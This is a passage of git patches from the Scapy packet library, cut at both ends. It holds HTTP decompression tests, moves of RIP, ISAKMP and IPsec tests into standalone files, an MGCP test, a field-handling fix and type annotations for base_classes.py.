1.0 html page with Content_Length +~ http + +load_layer("http") + +import os + +# Packet from +# https://community.cisco.com/t5/networking-documents/http-packet-captures/ta-p/3121453 +tmp = "/test/pcaps/http_content_length.pcap" +filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp +filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename + +expected_data = b"""Google
A faster way to browse the web



 
  Advanced Search
  Language Tools


Advertising Programs - Business Solutions - About Google

©2010 - Privacy
""" + + +conf.contribs["http"]["auto_compression"] = False +a = sniff(offline=filename, session=TCPSession) +pkt = a[7] +assert HTTP in pkt +assert HTTPResponse in pkt +assert pkt[HTTP].Content_Length == b'5012' +assert len(pkt[Raw].load) == 5012 + +conf.contribs["http"]["auto_compression"] = True +a = sniff(offline=filename, session=TCPSession) +pkt = a[7] +assert HTTP in pkt +assert HTTPResponse in pkt +print(pkt[Raw].load, expected_data) +assert pkt[Raw].load == expected_data + += HTTP decompression (gzip) + +conf.debug_dissector = True +load_layer("http") + +import os +import gzip + +tmp = "/test/pcaps/http_compressed.pcap" +filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp +filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename + +# First without auto decompression + +conf.contribs["http"]["auto_compression"] = False +pkts = sniff(offline=filename, session=TCPSession) + +data = b'\x1f\x8b\x08\x00\x00\x00\x00\x00\x02\xffEQ]o\xdb0\x0c\xfc+\x9a\x1f\x92\xa7\x9a\x96?\xe4\xb8\x892`I\x81\r\xe8\xda\xa2p1\xec\xa9P-\xd5\x16*[\x86\xa5\xd8K\x7f\xfd\xa8\x14E\x1f\x8e:R\x07\xf2D\xed\xbe\x1d\xef\x0f\xf5\xdf\x87\x1b\xd2\xf9\xde\x90\x87\xa7\x1f\xb7\xbf\x0e$\xba\x02\xf8\x93\x1d\x00\x8e\xf5\x91\xfc\xac\x7f\xdf\x92\xe5?9\x89QV\x01\x02\x00\x00' + +pkts[2].show() +assert HTTPResponse in pkts[2] +assert pkts[2].Expires == b'Mon, 22 Apr 2019 15:23:19 GMT' +assert pkts[2].Content_Type == b'text/html; charset=UTF-8' +assert pkts[2].load == data + +# Now with auto decompression + +conf.contribs["http"]["auto_compression"] = True +pkts = sniff(offline=filename, session=TCPSession) + +pkts[2].show() +assert HTTPResponse in pkts[2] +assert pkts[2].load == b'' + += HTTP decompression (brotli) +~ brotli + +conf.debug_dissector = True +load_layer("http") + +import os +import brotli + +tmp = "/test/pcaps/http_compressed-brotli.pcap" +filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp +filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename + +# First without auto decompression + +conf.contribs["http"]["auto_compression"] = False +pkts = sniff(offline=filename, session=TCPSession) + +data = b'\x1f\x41\x00\xe0\xc5\x6d\xec\x77\x56\xf7\xb5\x8b\x1c\x52\x10\x48\xe0\x90\x03\xf6\x6f\x97\x30\xd0\x40\x24\xb8\x01\x9b\xdb\xa0\xf4\x5c\x92\x4c\xc4\x6f\x89\x58\xf7\x4b\xf7\x4b\x6f\x8c\x2e\x2c\x28\x64\x06\x1d\x03' + +pkts[0].show() +assert HTTPResponse in pkts[0] +assert pkts[0].Content_Encoding == b'br' +assert pkts[0].Content_Type == b'text/plain' +assert pkts[0].load == data + +# Now with auto decompression + +conf.contribs["http"]["auto_compression"] = True +pkts = sniff(offline=filename, session=TCPSession) + +pkts[0].show() +assert HTTPResponse in pkts[0] +assert pkts[0].load == b'This is a test file for testing brotli decompression in Wireshark\n' + += HTTP decompression (zstd) +~ zstd + +conf.debug_dissector = True +load_layer("http") + +import os +import zstandard + +# sample server: $ socat -v TCP-LISTEN:8080,fork,reuseaddr SYSTEM:'(echo -ne "HTTP/1.1 200 OK\r\nContent-Encoding: zstd\r\n\r\n") > tmp && dd bs=1G count=1 status=none | zstd --stdout >> tmp && cat tmp' +# sample client: $ curl -v localhost:8080/tmp_echo_zstd_request_for_testing -o a.html +tmp = "/test/pcaps/http_compressed-zstd.pcap" +filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp +filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename + +# First without auto decompression + +conf.contribs["http"]["auto_compression"] = False +pkts = sniff(offline=filename) + +data = b'\x28\xb5\x2f\xfd\x04\x58\x45\x03\x00\xf2\x06\x19\x1c\x70\x89\x1b\xf6\x4f\x21\x1a\xbb\x28\xda\x9a\x1c\x34\xb8\x68\x1f\xd2\x82\xd7\x01\x8d\x36\xe5\x57\x1d\x0f\x38\x10\xa9\xa9\x86\x32\x96\x3d\xd4\xce\x2d\xa9\x2b\x01\x92\x94\xa8\x17\x23\xb7\xec\x9f\x6e\x96\x23\xb6\x13\x52\x97\xb2\x14\xf6\x0e\x9d\x57\x70\xf0\x2d\x7b\x87\x4c\x2a\x92\x10\x35\x68\x8d\xd9\xe6\x41\xbc\xf7\x73\x84\x07\x7e\xef\x48\xd1\x91\x0d\xef\x0b\x86\x8e\x6b\x86\x12\xaf\xb6\x05\x04\x01\x00\x29\x52\xd2\xfa' + +pkts[0].show() +assert HTTPResponse in pkts[0] +assert pkts[0].Content_Encoding == b'zstd' +assert pkts[0].load == data + +# Now with auto decompression + +conf.contribs["http"]["auto_compression"] = True +pkts = sniff(offline=filename) + +pkts[0].show() +assert HTTPResponse in pkts[0] +assert b'tmp_echo_zstd_request_for_testing' in pkts[0].load + += HTTP PSH bug fix + +tmp = "/test/pcaps/http_tcp_psh.pcap.gz" +filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp +filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename + +pkts = sniff(offline=filename, session=TCPSession) + +assert len(pkts) == 15 +# Verify a split header exists in the packet +assert pkts[5].User_Agent == b'example_user_agent' + +# Verify all of the response data exists in the packet +assert int(pkts[7][HTTP].Content_Length.decode()) == len(pkts[7][Raw].load) + += HTTP build + +pkt = TCP()/HTTP()/HTTPRequest(Method=b'GET', Path=b'/download', Http_Version=b'HTTP/1.1', Accept=b'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', Accept_Encoding=b'gzip, deflate', Accept_Language=b'en-US,en;q=0.5', Cache_Control=b'max-age=0', Connection=b'keep-alive', Host=b'scapy.net', User_Agent=b'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0') +raw_pkt = raw(pkt) +raw_pkt +assert raw_pkt == b'\x00P\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x00\x00\x00\x00GET /download HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.5\r\nCache-Control: max-age=0\r\nConnection: keep-alive\r\nHost: scapy.net\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\n\r\n' + += HTTP 1.1 -> HTTP 2.0 Upgrade (h2c) +~ Test h2c + +conf.debug_dissector = True +load_layer("http") +from scapy.contrib.http2 import H2Frame + +import os + +tmp = "/test/pcaps/http2_h2c.pcap" +filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp +filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename + +pkts = sniff(offline=filename, session=TCPSession) + +assert HTTPResponse in pkts[1] +assert pkts[1].Connection == b"Upgrade" +assert H2Frame in pkts[1] +assert pkts[1][H2Frame].settings[0].id == 3 + +for i in range(3, 10): + assert HTTP not in pkts[i] + assert H2Frame in pkts[i] + += Test chunked with gzip + +conf.contribs["http"]["auto_compression"] = False +z = b'\x1f\x8b\x08\x00S\\-_\x02\xff\xb3\xc9(\xc9\xcd\xb1\xcb\xcd)\xb0\xd1\x07\xb3\x00\xe6\xedpt\x10\x00\x00\x00' +a = IP(dst="1.1.1.1", src="2.2.2.2")/TCP(seq=1)/HTTP()/HTTPResponse(Content_Encoding="gzip", Transfer_Encoding="chunked")/(b"5\r\n" + z[:5] + b"\r\n") +b = IP(dst="1.1.1.1", src="2.2.2.2")/TCP(seq=len(a[TCP].payload)+1)/HTTP()/(hex(len(z[5:])).encode()[2:] + b"\r\n" + z[5:] + b"\r\n0\r\n\r\n") +xa, xb = IP(raw(a)), IP(raw(b)) +conf.contribs["http"]["auto_compression"] = True + +c = sniff(offline=[xa, xb], session=TCPSession)[0] +assert gzip_decompress(z) == c.load From 069d3168b31338cda6c86af60dbe174e8eb394d2 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 25 Oct 2020 11:01:44 +0100 Subject: [PATCH 0355/1632] Comment removed --- test/regression.uts | 4 ---- 1 file changed, 4 deletions(-) diff --git a/test/regression.uts b/test/regression.uts index bf7587a2b61..c697570b404 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -9619,10 +9619,6 @@ param1, param2 = SCTPChunkParamRandom(), SCTPChunkParamRandom() assert(param1.random != param2.random) -###################################### -# More PPI tests in contrib/ppi_cace # -###################################### - ############ ############ + 802.3 From 071d009abdfc488fd7384220441739210857a56e Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 25 Oct 2020 11:18:32 +0100 Subject: [PATCH 0356/1632] Standalone RIP unit tests Co-authored-by: Gabriel --- test/regression.uts | 21 +++++++-------------- test/scapy/layers/rip.uts | 18 ++++++++++++++++++ 2 files changed, 25 insertions(+), 14 deletions(-) create mode 100644 test/scapy/layers/rip.uts diff --git a/test/regression.uts b/test/regression.uts index c697570b404..8105513db2e 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -8610,22 +8610,15 @@ c = Ether(raw(p)) assert c[VRRPv3].chksum == 0x481b -############ -############ -+ RIP tests ++ MGCP tests -= RIP - build -s = raw(IP()/UDP(sport=520)/RIP()/RIPEntry()/RIPAuth(authtype=2, password="scapy")) -s == b'E\x00\x00H\x00\x01\x00\x00@\x11|\xa2\x7f\x00\x00\x01\x7f\x00\x00\x01\x02\x08\x02\x08\x004\xae\x99\x01\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\xff\x00\x02scapy\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' += MGCP - build +s = raw(IP(src="127.0.0.1")/UDP()/MGCP(endpoint="scapy@secdev.org", transaction_id="04523")) +s == b'E\x00\x00I\x00\x01\x00\x00@\x11|\xa1\x7f\x00\x00\x01\x7f\x00\x00\x01\n\xa7\n\xa7\x005\xf8\xaeAUEP 04523 scapy@secdev.org MGCP 1.0 NCS 1.0\n' -= RIP - UDP bindings -w = IP(raw(IP()/UDP()/RIP()/RIPEntry()/RIPAuth(authtype=2, password="scapy"))) -assert RIPAuth in w -assert w[RIPAuth].password.startswith(b"scapy") - -= RIP - dissection -p = IP(s) -RIPEntry in p and RIPAuth in p and p[RIPAuth].password.startswith(b"scapy") += MGCP - dissect +pkt = Ether(b'\x1b\x81\xb8\xa8J5\xe3\xebn\x90q\xb8\x08\x00E\x00\x00E\x00\x01\x00\x00@\x11\xf7\xde\xc0\xa8\x00\xff\xc0\xa8\x00y\n\xa7\n\xa7\x001\x05\xb5AUEP 155 god@heaven.com MGCP 1.0 NCS 1.0\n') +assert pkt[MGCP].endpoint == b'god@heaven.com' ############ diff --git a/test/scapy/layers/rip.uts b/test/scapy/layers/rip.uts new file mode 100644 index 00000000000..81b39d2ff45 --- /dev/null +++ b/test/scapy/layers/rip.uts @@ -0,0 +1,18 @@ +% RIP regression tests for Scapy + +############ +############ ++ RIP tests + += RIP - build +s = raw(IP()/UDP(sport=520)/RIP()/RIPEntry()/RIPAuth(authtype=2, password="scapy")) +s == b'E\x00\x00H\x00\x01\x00\x00@\x11|\xa2\x7f\x00\x00\x01\x7f\x00\x00\x01\x02\x08\x02\x08\x004\xae\x99\x01\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\xff\x00\x02scapy\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += RIP - UDP bindings +w = IP(raw(IP()/UDP()/RIP()/RIPEntry()/RIPAuth(authtype=2, password="scapy"))) +assert RIPAuth in w +assert w[RIPAuth].password.startswith(b"scapy") + += RIP - dissection +p = IP(s) +RIPEntry in p and RIPAuth in p and p[RIPAuth].password.startswith(b"scapy") From 96c25f39387e953bb17a95a694314aee31a8bab1 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 28 Oct 2020 20:12:27 +0100 Subject: [PATCH 0357/1632] Move IPsec unit tests --- test/{ => scapy/layers}/ipsec.uts | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename test/{ => scapy/layers}/ipsec.uts (100%) diff --git a/test/ipsec.uts b/test/scapy/layers/ipsec.uts similarity index 100% rename from test/ipsec.uts rename to test/scapy/layers/ipsec.uts From 7ccfcf1ee9d3b2d0a8a16695ae922cb13719577d Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 28 Oct 2020 20:18:00 +0100 Subject: [PATCH 0358/1632] Standalone ISAKMP unit tests Co-authored-by: Phil Co-authored-by: Gabriel --- test/regression.uts | 32 -------------------------------- test/scapy/layers/isakmp.uts | 35 +++++++++++++++++++++++++++++++++++ 2 files changed, 35 insertions(+), 32 deletions(-) create mode 100644 test/scapy/layers/isakmp.uts diff --git a/test/regression.uts b/test/regression.uts index ed891e6c8b4..c2123884d38 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1226,38 +1226,6 @@ r assert(r == b'5\x00\x00\x14\x00\x01\x00\x00 \x00\xac\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01') -############ -############ -+ ISAKMP transforms test - -= ISAKMP creation -~ IP UDP ISAKMP -p=IP(src='192.168.8.14',dst='10.0.0.1')/UDP()/ISAKMP()/ISAKMP_payload_SA(prop=ISAKMP_payload_Proposal(trans=ISAKMP_payload_Transform(transforms=[('Encryption', 'AES-CBC'), ('Hash', 'MD5'), ('Authentication', 'PSK'), ('GroupDesc', '1536MODPgr'), ('KeyLength', 256), ('LifeType', 'Seconds'), ('LifeDuration', 86400)])/ISAKMP_payload_Transform(res2=12345,transforms=[('Encryption', '3DES-CBC'), ('Hash', 'SHA'), ('Authentication', 'PSK'), ('GroupDesc', '1024MODPgr'), ('LifeType', 'Seconds'), ('LifeDuration', 86400)]))) -p.show() -p - - -= ISAKMP manipulation -~ ISAKMP -r = p[ISAKMP_payload_Transform:2] -r -r.res2 == 12345 - -= ISAKMP assembly -~ ISAKMP -hexdump(p) -raw(p) == b"E\x00\x00\x96\x00\x01\x00\x00@\x11\xa7\x9f\xc0\xa8\x08\x0e\n\x00\x00\x01\x01\xf4\x01\xf4\x00\x82\xbf\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00z\x00\x00\x00^\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00R\x01\x01\x00\x00\x03\x00\x00'\x00\x01\x00\x00\x80\x01\x00\x07\x80\x02\x00\x01\x80\x03\x00\x01\x80\x04\x00\x05\x80\x0e\x01\x00\x80\x0b\x00\x01\x00\x0c\x00\x03\x01Q\x80\x00\x00\x00#\x00\x0109\x80\x01\x00\x05\x80\x02\x00\x02\x80\x03\x00\x01\x80\x04\x00\x02\x80\x0b\x00\x01\x00\x0c\x00\x03\x01Q\x80" - - -= ISAKMP disassembly -~ ISAKMP -q=IP(raw(p)) -q.show() -r = q[ISAKMP_payload_Transform:2] -r -r.res2 == 12345 - - ############ ############ + TFTP tests diff --git a/test/scapy/layers/isakmp.uts b/test/scapy/layers/isakmp.uts new file mode 100644 index 00000000000..2cb3cbf2cca --- /dev/null +++ b/test/scapy/layers/isakmp.uts @@ -0,0 +1,35 @@ +% Scapy ISAKMP layer tests + + +############ +############ ++ ISAKMP tests + += ISAKMP creation +~ IP UDP ISAKMP +p=IP(src='192.168.8.14',dst='10.0.0.1')/UDP()/ISAKMP()/ISAKMP_payload_SA(prop=ISAKMP_payload_Proposal(trans=ISAKMP_payload_Transform(transforms=[('Encryption', 'AES-CBC'), ('Hash', 'MD5'), ('Authentication', 'PSK'), ('GroupDesc', '1536MODPgr'), ('KeyLength', 256), ('LifeType', 'Seconds'), ('LifeDuration', 86400)])/ISAKMP_payload_Transform(res2=12345,transforms=[('Encryption', '3DES-CBC'), ('Hash', 'SHA'), ('Authentication', 'PSK'), ('GroupDesc', '1024MODPgr'), ('LifeType', 'Seconds'), ('LifeDuration', 86400)]))) +p.show() +p + + += ISAKMP manipulation +~ ISAKMP +r = p[ISAKMP_payload_Transform:2] +r +r.res2 == 12345 + += ISAKMP assembly +~ ISAKMP +hexdump(p) +raw(p) == b"E\x00\x00\x96\x00\x01\x00\x00@\x11\xa7\x9f\xc0\xa8\x08\x0e\n\x00\x00\x01\x01\xf4\x01\xf4\x00\x82\xbf\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00z\x00\x00\x00^\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00R\x01\x01\x00\x00\x03\x00\x00'\x00\x01\x00\x00\x80\x01\x00\x07\x80\x02\x00\x01\x80\x03\x00\x01\x80\x04\x00\x05\x80\x0e\x01\x00\x80\x0b\x00\x01\x00\x0c\x00\x03\x01Q\x80\x00\x00\x00#\x00\x0109\x80\x01\x00\x05\x80\x02\x00\x02\x80\x03\x00\x01\x80\x04\x00\x02\x80\x0b\x00\x01\x00\x0c\x00\x03\x01Q\x80" + + += ISAKMP disassembly +~ ISAKMP +q=IP(raw(p)) +q.show() +r = q[ISAKMP_payload_Transform:2] +r +r.res2 == 12345 + + From 8f81b2b760c540f177ba317a9be362af7b37a6dc Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 7 Oct 2020 22:15:58 +0200 Subject: [PATCH 0359/1632] Remove FieldListField's i2m --- scapy/fields.py | 9 --------- test/fields.uts | 11 +++++++++++ 2 files changed, 11 insertions(+), 9 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 34950578352..077e9fbf427 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1831,15 +1831,6 @@ def i2len(self, pkt, val): # type: (BasePacket, List[Any]) -> int return int(sum(self.field.i2len(pkt, v) for v in val)) - def i2m(self, - pkt, # type: BasePacket - val, # type: Optional[List[Any]] - ): - # type: (...) -> List[Any] - if val is None: - val = [] - return val - def any2i(self, pkt, x): # type: (BasePacket, List[Any]) -> List[Any] if not isinstance(x, list): diff --git a/test/fields.uts b/test/fields.uts index cfe71233957..e1f44a7b07d 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -319,6 +319,17 @@ p = TestFLF(raw(a)) p assert Raw in p and p[Raw].load == b'\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x05' += Test mutability of the default values +~ field +class X(Packet): + fields_desc = [ FieldListField("f", [], ByteField("", 0)) ] + +m = X() +m.f.append(3) +assert raw(m) == b"\x03" +assert m.default_fields['f'] == [] +assert m.fields['f'] == [3] + ############ ############ From f6812197c7d99815b97957d8cfb359ce1b15ee58 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 23 Oct 2020 16:51:49 +0200 Subject: [PATCH 0360/1632] Type: base_classes/extlib/error --- .config/mypy/mypy_enabled.txt | 5 +- scapy/base_classes.py | 175 +++++++--- scapy/config.py | 67 ++-- scapy/error.py | 18 +- scapy/extlib.py | 1 + scapy/fields.py | 529 ++++++++++++++++--------------- scapy/layers/can.py | 14 +- scapy/layers/inet6.py | 4 +- scapy/layers/tls/record_sslv2.py | 3 +- scapy/packet.py | 177 ++++++----- scapy/plist.py | 23 +- scapy/themes.py | 15 + scapy/utils.py | 18 +- 13 files changed, 610 insertions(+), 439 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index d813a624fec..0e0d12799d0 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -7,10 +7,13 @@ # CORE scapy/__init__.py scapy/asn1/mib.py +scapy/base_classes.py scapy/compat.py scapy/config.py scapy/dadict.py scapy/data.py +scapy/error.py +scapy/extlib.py scapy/fields.py scapy/main.py scapy/packet.py @@ -26,4 +29,4 @@ scapy/utils.py # CONTRIB #scapy/contrib/http2.py # needs to be fixed scapy/contrib/roce.py -scapy/layers/can.py \ No newline at end of file +scapy/layers/can.py diff --git a/scapy/base_classes.py b/scapy/base_classes.py index ea4d2dfeb0e..6cf4aceea32 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -23,26 +23,50 @@ import types import warnings +import scapy from scapy.consts import WINDOWS +import scapy.modules.six as six from scapy.modules.six.moves import range from scapy.compat import ( + Any, + Dict, + Generic, + Iterator, + List, + Optional, + Tuple, + Type, + TypeVar, + Union, _Generic_metaclass, + cast, ) +try: + import pyx +except ImportError: + pass -class Gen(object): - __slots__ = [] +_T = TypeVar("_T") + + +@six.add_metaclass(_Generic_metaclass) +class Gen(Generic[_T]): + __slots__ = [] # type: List[str] def __iter__(self): + # type: () -> Iterator[_T] return iter([]) def __iterlen__(self): + # type: () -> int return sum(1 for _ in iter(self)) def _get_values(value): + # type: (Any) -> Any """Generate a range object from (start, stop[, step]) tuples, or return value. @@ -56,18 +80,17 @@ def _get_values(value): return value -class SetGen(Gen): +class SetGen(Gen[_T]): def __init__(self, values, _iterpacket=1): + # type: (Any, int) -> None self._iterpacket = _iterpacket if isinstance(values, (list, BasePacketList)): self.values = [_get_values(val) for val in values] else: self.values = [_get_values(values)] - def transf(self, element): - return element - def __iter__(self): + # type: () -> Iterator[Any] for i in self.values: if (isinstance(i, Gen) and (self._iterpacket or not isinstance(i, BasePacket))) or ( @@ -78,30 +101,32 @@ def __iter__(self): yield i def __repr__(self): + # type: () -> str return "" % self.values -class Net(Gen): +class Net(Gen[str]): """Generate a list of IPs from a network address or a name""" name = "ip" ip_regex = re.compile(r"^(\*|[0-2]?[0-9]?[0-9](-[0-2]?[0-9]?[0-9])?)\.(\*|[0-2]?[0-9]?[0-9](-[0-2]?[0-9]?[0-9])?)\.(\*|[0-2]?[0-9]?[0-9](-[0-2]?[0-9]?[0-9])?)\.(\*|[0-2]?[0-9]?[0-9](-[0-2]?[0-9]?[0-9])?)(/[0-3]?[0-9])?$") # noqa: E501 @staticmethod def _parse_digit(a, netmask): + # type: (str, int) -> Tuple[int, int] netmask = min(8, max(netmask, 0)) if a == "*": - a = (0, 256) + return (0, 256) elif a.find("-") >= 0: x, y = [int(d) for d in a.split('-')] if x > y: y = x - a = (x & (0xff << netmask), max(y, (x | (0xff >> (8 - netmask)))) + 1) # noqa: E501 + return (x & (0xff << netmask), max(y, (x | (0xff >> (8 - netmask)))) + 1) # noqa: E501 else: - a = (int(a) & (0xff << netmask), (int(a) | (0xff >> (8 - netmask))) + 1) # noqa: E501 - return a + return (int(a) & (0xff << netmask), (int(a) | (0xff >> (8 - netmask))) + 1) # noqa: E501 @classmethod def _parse_net(cls, net): + # type: (str) -> Tuple[List[Tuple[int, int]], int] tmp = net.split('/') + ["32"] if not cls.ip_regex.match(net): tmp[0] = socket.gethostbyname(tmp[0]) @@ -110,13 +135,16 @@ def _parse_net(cls, net): return ret_list, netmask def __init__(self, net): + # type: (str) -> None self.repr = net self.parsed, self.netmask = self._parse_net(net) def __str__(self): - return next(self.__iter__(), None) + # type: () -> str + return next(self.__iter__(), "") def __iter__(self): + # type: () -> Iterator[str] for d in range(*self.parsed[3]): for c in range(*self.parsed[2]): for b in range(*self.parsed[1]): @@ -124,44 +152,52 @@ def __iter__(self): yield "%i.%i.%i.%i" % (a, b, c, d) def __iterlen__(self): + # type: () -> int return reduce(operator.mul, ((y - x) for (x, y) in self.parsed), 1) def choice(self): + # type: () -> str return ".".join(str(random.randint(v[0], v[1] - 1)) for v in self.parsed) # noqa: E501 def __repr__(self): + # type: () -> str return "Net(%r)" % self.repr def __eq__(self, other): + # type: (Any) -> bool if not other: return False if hasattr(other, "parsed"): p2 = other.parsed else: p2, nm2 = self._parse_net(other) - return self.parsed == p2 + return bool(self.parsed == p2) def __ne__(self, other): + # type: (Any) -> bool # Python 2.7 compat return not self == other - __hash__ = None + __hash__ = None # type: ignore def __contains__(self, other): + # type: (Union[str, Net]) -> bool if hasattr(other, "parsed"): - p2 = other.parsed + p2 = cast(Net, other).parsed else: - p2, nm2 = self._parse_net(other) + p2, _ = self._parse_net(cast(str, other)) return all(a1 <= a2 and b1 >= b2 for (a1, b1), (a2, b2) in zip(self.parsed, p2)) # noqa: E501 def __rcontains__(self, other): + # type: (str) -> bool return self in self.__class__(other) -class OID(Gen): +class OID(Gen[str]): name = "OID" def __init__(self, oid): + # type: (str) -> None self.oid = oid self.cmpt = [] fmt = [] @@ -174,9 +210,11 @@ def __init__(self, oid): self.fmt = ".".join(fmt) def __repr__(self): + # type: () -> str return "OID(%r)" % self.oid def __iter__(self): + # type: () -> Iterator[str] ii = [k[0] for k in self.cmpt] while True: yield self.fmt % tuple(ii) @@ -192,6 +230,7 @@ def __iter__(self): i += 1 def __iterlen__(self): + # type: () -> int return reduce(operator.mul, (max(y - x, 0) + 1 for (x, y) in self.cmpt), 1) # noqa: E501 @@ -199,26 +238,32 @@ def __iterlen__(self): # Packet abstract and base classes # ###################################### -class Packet_metaclass(type): - def __new__(cls, name, bases, dct): +class Packet_metaclass(_Generic_metaclass): + def __new__(cls, # type: ignore + name, # type: str + bases, # type: Tuple[type, ...] + dct # type: Dict[str, Any] + ): + # type: (...) -> Type['scapy.packet.Packet'] if "fields_desc" in dct: # perform resolution of references to other packets # noqa: E501 - current_fld = dct["fields_desc"] - resolved_fld = [] - for f in current_fld: - if isinstance(f, Packet_metaclass): # reference to another fields_desc # noqa: E501 - for f2 in f.fields_desc: - resolved_fld.append(f2) + current_fld = dct["fields_desc"] # type: List[Union['scapy.fields.Field'[Any, Any], Packet_metaclass]] # noqa: E501 + resolved_fld = [] # type: List['scapy.fields.Field'[Any, Any]] + for fld_or_pkt in current_fld: + if isinstance(fld_or_pkt, Packet_metaclass): + # reference to another fields_desc + for pkt_fld in fld_or_pkt.fields_desc: # type: ignore + resolved_fld.append(pkt_fld) else: - resolved_fld.append(f) + resolved_fld.append(fld_or_pkt) else: # look for a fields_desc in parent classes - resolved_fld = None + resolved_fld = [] for b in bases: if hasattr(b, "fields_desc"): - resolved_fld = b.fields_desc + resolved_fld = b.fields_desc # type: ignore break if resolved_fld: # perform default value replacements - final_fld = [] + final_fld = [] # type: List['scapy.fields.Field'[Any, Any]] names = [] for f in resolved_fld: if f.name in names: @@ -247,18 +292,22 @@ def __new__(cls, name, bases, dct): dct["_%s" % attr] = dct.pop(attr) except KeyError: pass - newcls = super(Packet_metaclass, cls).__new__(cls, name, bases, dct) - newcls.__all_slots__ = set( + newcls = type.__new__(cls, name, bases, dct) + # Note: below can't be typed because we use attributes + # created dynamically.. + newcls.__all_slots__ = set( # type: ignore attr for cls in newcls.__mro__ if hasattr(cls, "__slots__") for attr in cls.__slots__ ) - newcls.aliastypes = [newcls] + getattr(newcls, "aliastypes", []) + newcls.aliastypes = ( # type: ignore + [newcls] + getattr(newcls, "aliastypes", []) + ) if hasattr(newcls, "register_variant"): - newcls.register_variant() - for f in newcls.fields_desc: + newcls.register_variant() # type: ignore + for f in newcls.fields_desc: # type: ignore if hasattr(f, "register_owner"): f.register_owner(newcls) if newcls.__name__[0] != "_": @@ -267,29 +316,44 @@ def __new__(cls, name, bases, dct): return newcls def __getattr__(self, attr): - for k in self.fields_desc: + # type: (str) -> 'scapy.fields.Field'[Any, Any] + for k in self.fields_desc: # type: ignore if k.name == attr: - return k + return k # type: ignore raise AttributeError(attr) - def __call__(cls, *args, **kargs): + def __call__(cls, + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> 'scapy.packet.Packet' if "dispatch_hook" in cls.__dict__: try: - cls = cls.dispatch_hook(*args, **kargs) + cls = cls.dispatch_hook(*args, **kargs) # type: ignore except Exception: from scapy import config if config.conf.debug_dissector: raise - cls = config.conf.raw_layer - i = cls.__new__(cls, cls.__name__, cls.__bases__, cls.__dict__) + cls = config.conf.raw_layer # type: ignore + i = cls.__new__( + cls, # type: ignore + cls.__name__, + cls.__bases__, + cls.__dict__ + ) i.__init__(*args, **kargs) - return i + return i # type: ignore # Note: see compat.py for an explanation class Field_metaclass(_Generic_metaclass): - def __new__(cls, name, bases, dct): + def __new__(cls, # type: ignore + name, # type: str + bases, # type: Tuple[type, ...] + dct # type: Dict[str, Any] + ): + # type: (...) -> Type['scapy.fields.Field'[Any, Any]] dct.setdefault("__slots__", []) newcls = super(Field_metaclass, cls).__new__(cls, name, bases, dct) return newcls @@ -298,20 +362,25 @@ def __new__(cls, name, bases, dct): PacketList_metaclass = Field_metaclass -class BasePacket(Gen): - __slots__ = [] +class BasePacket(Gen['scapy.packet.Packet']): + __slots__ = [] # type: List[str] ############################# # Packet list base class # ############################# -class BasePacketList(object): - __slots__ = [] +class BasePacketList(Gen[_T]): + __slots__ = [] # type: List[str] class _CanvasDumpExtended(object): + def canvas_dump(self, **kwargs): + # type: (**Any) -> 'pyx.canvas.canvas' + pass + def psdump(self, filename=None, **kargs): + # type: (Optional[str], **Any) -> None """ psdump(filename=None, layer_shift=0, rebuild=1) @@ -324,7 +393,9 